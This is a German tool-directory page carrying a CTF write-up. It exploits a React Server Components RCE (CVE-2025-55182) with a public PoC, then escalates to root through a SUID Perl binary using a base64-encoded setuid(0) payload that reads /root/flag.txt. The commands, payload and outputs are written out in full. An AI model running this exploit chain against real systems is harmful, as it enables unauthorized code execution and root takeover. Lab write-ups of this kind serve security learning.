Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Explosive-As-Hell-MCS-Qualifer-Web-500 — [First-Blood-XO] React Server Component-Endpunkt anfällig für CVE-2025-55182 (RCE) → SUID-Binärdateien aufgezählt → /usr/bin/perl hatte SUID gesetzt → nutzte Perls POSIX setuid(0), um zu Root zu eskalieren → las /root/flag.txt | Kitploit
Tools/GitHubGitHub/abdullahmaqbool22/explosive-as-hell-mcs-qualifer-web-500
Privilege EscalationAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungBinary-Exploitation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Labs & Praxis
GitHubabdullahmaqbool22/explosive-as-hell-mcs-qualifer-web-500

Explosive-As-Hell-MCS-Qualifer-Web-500

[First-Blood-XO] React Server Component-Endpunkt anfällig für CVE-2025-55182 (RCE) → SUID-Binärdateien aufgezählt → /usr/bin/perl hatte SUID gesetzt → nutzte Perls POSIX setuid(0), um zu Root zu eskalieren → las /root/flag.txt

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

CVE-2025-55182 — React Server Components RCE | CTF-Lösungsbericht

Kategorie: Web Exploitation | Schwierigkeit: Mittel | Schwachstelle: Remote Code Execution → SUID-Privilegienerweiterung


TL;DR

React Server Component-Endpunkt anfällig für CVE-2025-55182 (RCE) → SUID-Binärdateien aufgezählt → /usr/bin/perl hatte SUID gesetzt → Perls POSIX setuid(0) verwendet, um auf root zu eskalieren → /root/flag.txt gelesen.

Flag: MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}


Schritt 1 — Aufklärung

Ziel: http://challenge.cybermesh.site:30035/

Das Ziel war eine React-basierte Webanwendung, die React Server Components (RSC) nutzt – eine relativ neue Architektur, die Komponenten serverseitig ausführt und serialisierte Ausgaben über ein benutzerdefiniertes Drahtformat zurück an den Client streamt.

Diese Architektur führt eine serverseitige Ausführungsgrenze ein. Eine unsachgemäße Eingabebehandlung an dieser Grenze ist genau das, was CVE-2025-55182 ausnutzt.


Schritt 2 — Schwachstelle: CVE-2025-55182

React Server Components RCE — Der Server unterlässt es, benutzergesteuerte Eingaben zu bereinigen, bevor sie die serverseitige Komponentenausführungsschicht erreichen. Dies ermöglicht einem Angreifer, OS-Shell-Befehle einzuschleusen, die im Kontext des Node.js-Prozesses ausgeführt werden.

Angriffsablauf:

  1. Angreifer erstellt eine bösartige RSC-Nutzlast
  2. Server deserialisiert die Eingabe und übergibt unbereinigte Werte an eine Server-Komponentenfunktion
  3. OS-Befehl wird ausgeführt, Ausgabe wird zurück in die RSC-Antwort gestreamt
  4. Angreifer liest die Befehlsausgabe aus dem Antwortkörper

Schritt 3 — Exploit-Einrichtung

Ein öffentlicher PoC existiert für diese CVE:

root@kitploit:~
git clone https://github.com/surajhacx/react2shellpoc.git
cd react2shellpoc

Erste Überprüfung — Bestätigung von RCE und Ausführungskontext:

root@kitploit:~
python exploit.py -t http://challenge.cybermesh.site:30035/ -c "whoami"

Ausgabe:

root@kitploit:~
[+] EXPLOITATION SUCCESSFUL

  ► app

Der Server läuft als Benutzer app. Nicht root – Eskalation erforderlich.


Schritt 4 — SUID-Enumeration

Suche nach SUID-Binärdateien:

root@kitploit:~
python exploit.py -t http://challenge.cybermesh.site:30035/ \
  -c "find /bin /usr/bin /sbin /usr/sbin -perm -4000 2>/dev/null || true"

Ausgabe:

root@kitploit:~
[+] EXPLOITATION SUCCESSFUL

  ► /usr/bin/gpasswd
  ► /usr/bin/perl       <--- !!!
  ► /usr/bin/chsh
  ► /usr/bin/su
  ► /usr/bin/chfn
  ► /usr/bin/umount
  ► /usr/bin/mount
  ► /usr/bin/passwd
  ► /usr/bin/newgrp

/usr/bin/perl hat das SUID-Bit gesetzt. Dies ist ein bekannter GTFOBin – wenn Perl root gehört und SUID gesetzt ist, führt es es mit Root-Rechten aus, unabhängig davon, wer es aufruft.


Schritt 5 — Privilegienerweiterung via SUID Perl

Erstellte eine base64-kodierte Perl-Nutzlast, die:

  • Setzt den PATH
  • Ruft POSIX::setuid(0) auf, um auf root zu eskalieren
  • Öffnet und liest /root/flag.txt

Ausgeliefert über den RCE-Endpunkt:

root@kitploit:~
python exploit.py \
  -t http://challenge.cybermesh.site:30035/ \
  -c "echo dXNlIFBPU0lYOyRFTlZ7UEFUSH09Jy9iaW46L3Vzci9iaW4nO3NldHVpZCgwKTtvcGVuKG15JHZkQzlmbGFnLCc8JywgJy9yb290L2ZsYWcudHh0Jyk7cHJpbnQgd2hpbGUoPCR2ZEM+KTs= | base64 -d > /tmp/p.pl && /usr/bin/perl /tmp/p.pl"

Die dekodierte Nutzlast sieht ungefähr so aus:

root@kitploit:~
use POSIX;
$ENV{PATH}='/bin:/usr/bin';
setuid(0);
open(my $vdC9flag,'<', '/root/flag.txt');
print while(<$vdC9flag>);

Ausgabe:

root@kitploit:~
[+] EXPLOITATION SUCCESSFUL

  ► MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}

Flag

root@kitploit:~
MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}

Wichtige Erkenntnisse

1. Die Angriffsfläche von RSC wird unterschätzt.
React Server Components sind ein neues Paradigma. Viele Bereitstellungen sind nicht gegen Eingabeinjektion an der Server-Komponenten-Grenze gehärtet. Diese CVE erinnert daran, dass „Server-seitiges Rendern“ nicht von Natur aus sicher ist – die Ausführungsgrenze benötigt dennoch ordnungsgemäße Bereinigung.

2. SUID auf Scripting-Laufzeiten = sofortiger Root.
/usr/bin/perl mit SUID ist eine lehrbuchmäßige Fehlkonfiguration. GTFOBins behandelt es ausführlich. Setzen Sie niemals das SUID-Bit auf Skriptsprachen (Perl, Python, Ruby, etc.) – im Gegensatz zu kompilierten Binärdateien, die für SUID ausgelegt sind (su, passwd), bieten diese Laufzeiten triviale Eskalationspfade.

3. Die Flagge ist selbstreflexiv.
SU1D_AR3_FUN_BUT_N0T_EVERYTIM3 – die Herausforderung wurde explizit um SUID Perl als beabsichtigten Eskalationspfad entworfen. Saubere Kette.


Zusammenfassung der Angriffskette

root@kitploit:~
CVE-2025-55182 (RSC RCE)
    └─> whoami → Benutzer "app"
    └─> Suche nach SUID-Binärdateien
    └─> /usr/bin/perl (SUID root) identifiziert
    └─> base64 Perl-Nutzlast → in /tmp/p.pl schreiben
    └─> SUID perl /tmp/p.pl → setuid(0) → cat /root/flag.txt
    └─> FLAG ✓

Referenzen

  • github.com/surajhacx/react2shellpoc
  • GTFOBins — perl SUID
  • NVD — CVE-2025-55182

Geschrieben von Abdullah Maqbool — Penetration Testing Engineer bei TISS | CRTA · CRTOM · CompTIA PenTest+

Tool herunterladen